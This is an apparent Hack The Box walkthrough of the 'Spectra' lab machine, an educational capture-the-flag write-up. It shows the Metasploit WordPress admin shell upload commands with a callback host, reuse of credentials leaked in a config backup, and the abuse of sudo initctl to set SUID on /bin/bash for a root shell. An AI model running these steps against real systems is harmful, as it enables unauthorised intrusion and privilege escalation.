Spectra HacktheBox Walkthrough
Today we are going to accept the boot2root challenge of Spectra –Hack the box lab. Through this lab, we are going to check our skills in WordPress Exploitation and basic privilege escalation.
Table Of Content
- Website enumeration
- WordPress Metasploit
- Abusing Sudo rights
Let’s start our journey.
nmap –A 10.129.223.138
Through Nmap scan, we get to know that there are three open ports i.e. Port 22 –SSH version OpenSSH 8.1, Port 80 –HTTP, and port 3306 –MySQL.
First, we are exploring Port 80 in the web browser, and get a simple page with having two links Software Issue Tracker and Test.
Both links Redirected to spectra.htb, so We need to edit the host file.
Now we will try to explore both links found after navigating port 80. Once we click on the test link we get the “error establishing a database connection”. It seems nothing important.
We navigate spectra.htb/testing in the web browser and we find two wordpress config files i.e wp-config.php and wp-config.php.save.
Wp-config.php.save is the base configuration file for WordPress.After access it through curl we find something interesting in it i.eMYSQL database credential’s username ‘devtest’ and password devteam01
Happily, we login the WordPress but unfortunately, the above-found credentials are not working, and getting the error” Unknown username. Check again or try your email address”.
Looking back, now it’s time to explore the first link software issue tracker found on HTTP 80.
This leads us to a basic WordPress page with the administrator’s sample post. We learn from this that the username “Administrator” is a viable option. We go to the wp-login page once more to log in.
Great!! Successfully we logged in and it redirects to the administration email verification.
Just click on “This email is correct” and get into it.
After some enumeration, we find that the WordPress version is not updated. Accordingly, we explore the Metasploit exploit and set the required options as we have already fetched the username and password i.e. administrator and devteam01 respectively. Below is the module:
use exploit/unix/webapp/wp_admin_shell_upload set rhosts 10.129.223.138 set targeturi /main set password devteam01 set lhost 10.10.14.100 exploit
While doing enumeration, we come across there is another user name as “Katie”.
Very soon we decide that user Katie does not have permission to access user.txt.
cd /home/katie ls cat user.txt
After some file enumeration, an intriguing script autologin.conf.orig find in the /opt/ directory
cd opt ls -la
This script retrieves a password from the passwd file in the /etc/autologin directory.
I navigate to the file and grab the password. Next, I try the password against my list of users found above.
cd /etc/autologin ls -la cat passwd
Let’s utilise the credential we enumerated for user Katie to log into SSH. We discovered that Katie is a member of the developer’s group using the id command. We next checked Katie’s sudo rights and discovered that user can run /sbin/initctl as root. Initctl is a linux init daemon control utility.
ssh email@example.com id sudo –l find / -type f –group developers 2>dev/null –ls cat /etc/init/test.conf
Let’s abuse test.conf file and replace the existing content with the following line that will enable SUID bit for /bin/bash.
chmod +s /bin/bash end script
We can use Katie’s privilege to start test.conf, which will run the script to enable the SUID permission on /bin/bash, because user has root permission to run initctl.
sudo /sbin/initctl start test /bin/bash –p
Kudos!! Finally, we capture the ROOT flag after obtaining the root privilege shell.
Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here